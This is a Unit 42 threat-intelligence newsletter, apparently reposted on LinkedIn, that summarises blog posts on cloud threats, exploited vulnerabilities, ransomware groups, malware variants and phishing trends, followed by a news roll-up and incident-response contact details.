Unit 42 Threat Intel Bulletin - June

Unit 42 Threat Intel Bulletin - June

Cybersecurity Trends

No alt text provided for this image

Read the Unit 42 Cloud Threat Report, Volume 7 to learn from real cloud breaches that happened in 2022.

Register for our virtual Code to Cloud Cybersecurity Summit.

No alt text provided for this image
No alt text provided for this image

Unit 42 Threat Intel Blogs

No alt text provided for this image

Attack Surface Risks, Challenges and Changes (Attack Surface Management)

While digitization has simplified many organizational tasks, it has simultaneously made other facets of business more complex, including an ever-growing attack surface. As the number of connected devices and online services continues to grow, identifying all of these assets and potential vulnerabilities is a challenge. Implementing effective security measures becomes more difficult, especially if you are relying on manual inventory processes.

What to know

No alt text provided for this image

Unit 42 Unveils Most ‘Expansive’ Cloud Threat Research Yet: Cloud Threat Report Volume 7 Examines the Expanding Attack Surface (Cloud, Reports)

The cloud attack surface is as dynamic as the cloud itself. As organizations around the globe increasingly share, store and manage data in the cloud, this expands organizations’ attack surface exponentially. This expansion often happens in ways that are unknown, overlooked or improperly secured. For threat actors, each workload in the cloud presents an opportunity, and without proper management, organizations are exposed to risk in countless ways.

Key findings

No alt text provided for this image

Network Security Trend: November 2022- January 2023 (Malware)

Recent observations of exploits used in the wild November 2022-January 2023 reveal that attackers have been using newly published remote code execution vulnerabilities in the following three products:

  • Roxy-WI, a web interface for managing and monitoring RoxyDNS
  • CWP, a free web hosting control panel (aka Control Web Panel or CentOS Web Panel)
  • Cacti, an open-source network monitoring and graphing tool used to track the performance of various network devices, servers and applications

Expand your knowledge

No alt text provided for this image

Teasing the Secrets from Threat Actors: Malware Configuration Parsing at Scale (Malware)

Configuration data that changes across each instance of deployed malware can be a gold mine of information about what the bad guys are up to. The problem is that configuration data in malware is usually difficult to parse statically from the file, by design. Malware authors know the intelligence value as they provide directives for how the malware should behave.

Learn more

No alt text provided for this image

Threat Assessment: Royal Ransomware (Ransomware, Threat Briefs)

Royal ransomware has been involved in high-profile attacks against critical infrastructure, especially healthcare, since it was first observed in September 2022. Bucking the popular trend of hiring affiliates to promote their threat as a service, Royal ransomware operates as a private group made up of former members of Conti.

Find out more

No alt text provided for this image

Chinese Alloy Taurus Updates PingPull Malware (Malware)

Unit 42 researchers recently identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.

Discover the details

No alt text provided for this image

Recent Trends in Internet Threats: Common Industries Impersonated in Phishing Attacks, Web Skimmer Analysis and More (Malware)

From July-December 2022, Unit 42 researchers have observed and analyzed over 67 million unique malicious URLs, domains and IPs, which we use to block associated malicious network traffic. We will cover the trends we have observed during the second half of 2022 based on our detections of malicious URLs, domains and IPs.

Learn the trends

No alt text provided for this image

Threat Actors Rapidly Adopt Web3 IPFS Technology (Malware)

During 2022, analysts from Unit 42 observed the rampant adoption of the InterPlanetary File System (aka IPFS) being used as a vehicle for malicious intent. IPFS is a Web3 technology that decentralizes and distributes the storage of files and other data into a peer-to-peer network.

Who are these threat actors

No alt text provided for this image

Chat GPT-Themed Scam Attacks Are on the Rise (Malware)

Unit 42 researchers are monitoring the trending topics, newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.

Discover valuable insights

No alt text provided for this image

Vice Society: A Tale of Victim Data Exfiltration via PowerShell, aka Stealing off the Land (Ransomware)

During a recent incident response (IR) engagement, the Unit 42 team identified that the Vice Society ransomware gang exfiltrated data from a victim network using a custom built Microsoft PowerShell (PS) script. We’ll break down the script used, explaining how each function works in order to shed light on this method of data exfiltration.

Uncover the story

No alt text provided for this image

Threat Roll-up

  • (ATT&CK) ATT&CK v13 is out! MITRE has a new blog post talking about feature improvements. (Source: MITRE)?
  • (Ransomware) Colleges and schools across US dealing with ransomware incidents, cyberattacks. (Source: TheRecord[.]media)
  • (Cyber Wins) 288 dark web vendors arrested in major marketplace seizure. (Source: Europol)
  • (Artificial Intelligence) Artificial intelligence pioneer Geoffrey Hinton, referred to by some as the Godfather of A.I., leaves Google over risks of emerging tech. (Source: TechSpot)
  • (Artificial Intelligence) White House Pushes Tech C.E.O.s to Limit Risks of A.I. (Source: The New York Times)
  • (Supply Chain Compromise) Analysis | Years after discovery of SolarWinds breach, Russian hackers could be struggling. Officials detailed their response to the hack at the RSA Conference in San Francisco. (Source: Washington Post)
  • (APT) Chinese hackers outnumber FBI cyber staff 50 to 1, bureau director says. (Source: CNBC)
  • (Cybercrime) The cybercriminal gang LockBit has now set its sights on Apple products after having developed its first ransomware for Macs. (Source: Digital Trends)
  • (Malware) Enterprise networks are being targeted by a sneaky new malware. Russian "Pupy" is after corporate networks in the West. (Source: TechRadar)

No alt text provided for this image

More Information

No alt text provided for this image

Under Attack?

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team by filling out this form or calling: North America Toll-Free: 1.866.486.4842 (866.4.UNIT42), UK: +44.20.3743.3660, EMEA: +31.20.299.3130, APAC: +65.6983.8730, and Japan: +81.50.1790.0200.

If you have cyber insurance or legal counsel, you can request for Unit 42 to serve as your incident response team. Unit 42 is on over 70 cyber insurance panels as a preferred vendor.

KRISHNAN N NARAYANAN

Sales Associate at American Airlines

1 年

Great opportunity

回复

要查看或添加评论,请登录

Palo Alto Networks Unit 42的更多文章

社区洞察

其他会员也浏览了